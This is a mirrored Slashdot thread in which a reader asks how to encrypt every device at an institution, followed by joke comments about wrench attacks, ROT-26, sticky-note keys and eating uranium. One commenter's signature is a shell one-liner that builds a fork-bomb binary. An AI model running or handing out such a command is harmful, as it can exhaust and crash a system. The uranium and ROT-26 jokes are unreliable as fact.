Slashdot Mirror

← Back to Stories (view on slashdot.org)

How To, When You Have To Encrypt Absolutely Everything?

Posted by ScuttleMonkey on from the first-step-is-teaching-people-how-not-to-be-stupid dept.

Dark Neuron writes "My institution has thousands of computers, and is looking at starting an IT policy to encrypt everything, all hard drives, including desktops, laptops, external hard drives, USB flash drives, etc. I am looking at an open source product for Windows, Mac, UNIX, as well as portable hard drives, but I am concerned about overhead and speed penalties. Does anyone have experience and/or advice with encrypting every single device in a similar situation?"

21 of 468 comments (clear)

  1. Hard Drive Encryption - Theory vs. Reality by Concern · · Score: 3, Funny

    Let me explain to you how this works. In pictures:

    http://xkcd.com/538/

    --
    Tired of Political Trolls? Opt Out!
    1. Re:Hard Drive Encryption - Theory vs. Reality by Sancho · · Score: 5, Funny

      Of course, if you're using Truecrypt, they won't know when to stop hitting you.

    2. Re:Hard Drive Encryption - Theory vs. Reality by Rinisari · · Score: 4, Funny

      Yeah...

      Encryption will save your and your institution versus legal attacks, but if others' "people" may talk to your "people" with a wrench, then only iron will can save you.

      Even biometrics can be fooled (e.g., eyeballs and fingers aren't that hard to remove these days).

      --
      Colin Dean Go a year without DRM
    3. Re:Hard Drive Encryption - Theory vs. Reality by BrotherBeal · · Score: 3, Funny

      eyeballs and fingers aren't that hard to remove these days

      These days? Bodily mutilation is like the GEICO of injury - so easy, a caveman could do it.

      --
      I'm disabling ads until because I choose not to reward redesigns that are less usable than "view source".
  2. ROT 26 by spike2131 · · Score: 5, Funny

    Tell the suits you are implementing state-of-the art ROT-26 encryption on everything. Take a month off. Come back, pronounce it complete, and ask for a raise.

    --
    SpyDock: Scientific Python in a Docker container
    1. Re:ROT 26 by Red+Flayer · · Score: 4, Funny

      That'll never work, it's too obvious. Even the PHBs recognize that there are 26 letters in the alphabet... that number may raise questions.

      I suggest obfuscating it slightly, pardon the 'irregularities' of my math :)

      ROT-26 Swap 2*13 for 26.
      ROT-(2*13) Swap Triskadeca for 13
      ROT-(2*Triskadeca) Swap Duplo for 2*
      ROT-Duplotriskadeca Add Duplotriskadeca to both sides
      ROT = Duplotriskadeca Eliminate
      0 = Dupliskadeca Let d = 4; add 1 to each side
      1 + 0 = Dupliska(4 + 1)eca = Dupliskaeeca Reorder
      1 = cakeisadupel We know that l looks like 1, so go ahead and eliminate.
      0 = cake is a dupe

      The cake statement is a false, a lie!

      Hence we can call this DoublePortal encryption, while knowing we maintained mathematical purity for the name.

      Use of this naming convention for ROT(26) will surely be more amenable to the PHBs.

      --
      "Trolls they were, but filled with the evil will of their master: a fell race..." -- J.R.R. Tolkien on Olog-hai
  3. Re:Key Management by starglider29a · · Score: 4, Funny

    An elaborate system of Post It Notes (All ROT13'd)

  4. Re:Have fun with management by cs02rm0 · · Score: 5, Funny

    Maybe its just the corporate environment that I'm in and please I would love to be wrong. But from what I can tell a good number of open sourced products just don't scale up to the enterprise level.

    There aren't any tools that manage them centrally and allow for compliance and auditing.

    Crap. Has anyone told Google yet? Best get them to switch to Windows quickly!

  5. Re:Key Management? by MobyDisk · · Score: 5, Funny

    To empower individuals to utilize synergistic approaches to achieve goals and exceed expectations. :)

  6. Re:Key Management? by SebaSOFT · · Score: 2, Funny

    All keys are '12345'

  7. I have a pdf detailing such a policy by Anonymous Coward · · Score: 2, Funny

    But I encrypted it and lost the keys.

    It was a perfect design and I am sad to have lost it.

  8. PLAESE BACK UP FRIST!!! by linhares · · Score: 5, Funny

    Plase back everything up frist! Send it to us at editor@wikileaks.org and we'll store that data for you for free. We have mirror sites to protect the data; just send it before encrypting it.

  9. Re:TrueCrypt or Wait for On Drive Upgrades by Hal_Porter · · Score: 5, Funny

    Coming from an Org that encrypts everything

    Tom Cruise? Is that you?

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
  10. Re:TrueCrypt or Wait for On Drive Upgrades by Anonymous Coward · · Score: 1, Funny

    The outrageous cost is offensive, but you need to pay to pay in an enterprise environment right now.

    Steve Ballmer? Is that you?

  11. Re:Yellow sticky notes by Hatta · · Score: 2, Funny

    5. I've had the security chick for a vault blow me

    Nice.

    --
    Give me Classic Slashdot or give me death!
  12. Re:Key Management? by TheSpoom · · Score: 2, Funny

    *patents*

    --
    It's better to vote for what you want and not get it than to vote for what you don't want and get it.
    - E. Debs
  13. Don't do it! by Anonymous Coward · · Score: 1, Funny

    This is a perfect example of an IT directive to solve a problem that does not exist. Encrypting at the drive level can be useful if your key management is good, but it is not meant to be a catch-all for security. Your best bet is to only encrypt the data that absolutely needs to be. As someone mentioned above, use a thin-client model to keep the complexity low. Use an e-mail client that supports encryption if you must, though e-mail is generally not a safe place for anything secure anyway. Make sure your intranet keeps the browser from caching secure data, and train your staff to store top-secret information on an encrypted document server.

    I understand that there is sometimes a need to be paranoid about a stolen laptop, but the XKCD strip linked above is dead on when it comes to what this sort of "security" actually provides. At best it is obscurity. At worst, it slows everyone's life down, bogs down IT support and operations, and chews up funds that would be better used for something like salaries.

    Personally, I think we should move away from the dedicated machine model for all employees. It's much less expensive to secure your intranet servers and expose them through secure tunnels through the internet. Now, all your employees need is an abacus with a good battery.

  14. The only free, safe comprehensive solution is. . . by Slicebo · · Score: 2, Funny

    dl;kjf9s00, so*9fosdikjk oi*5 soej1j2+~. 7dtTk34l ";Leu3*7&.

    #@$tjke,

    s-=3k,3j

  15. Re:TrueCrypt or Wait for On Drive Upgrades by BLQWME · · Score: 2, Funny

    No, that was Rod Blagojevich.

    --
    "Nobody shoots anybody in the face unless you're a hit man or a video gamer"- Jack Thompson
  16. Re:Theory vs. Reality - Seriously by blind+monkey+3 · · Score: 2, Funny

    It would never work anyway, all our employees are fitted with a hollow tooth full of cyanide to cover such contingencies.

    P.S. Just lost Joe from HR... he had an accident while eating a brazil nut.

    --
    BM3
  17. Re:Theory vs. Reality - Seriously by gnick · · Score: 2, Funny

    OK! OK! Just leave the dog out of it!

    The big secret, I mean the one they really keep under wraps to try to keep the nuclear genie in the bottle... Is that plutonium and uranium are delicious. Really, really good - Here in Los Alamos we sprinkle highly enriched uranium on our corn-flakes in the morning - It's a great wake-me-up. Devouring large quantities of uranium (even un-enriched) and then 'processing' it internally is how the slugs are manufactured for gun-type weapons (the enrichment is done in the small intestine). Making an implosion weapon necessitates a circus elephant.

    So, now that you know, feel free to go improvise a couple of nukes, just leave the dog alone!

    --
    He's getting rather old, but he's a good mouse.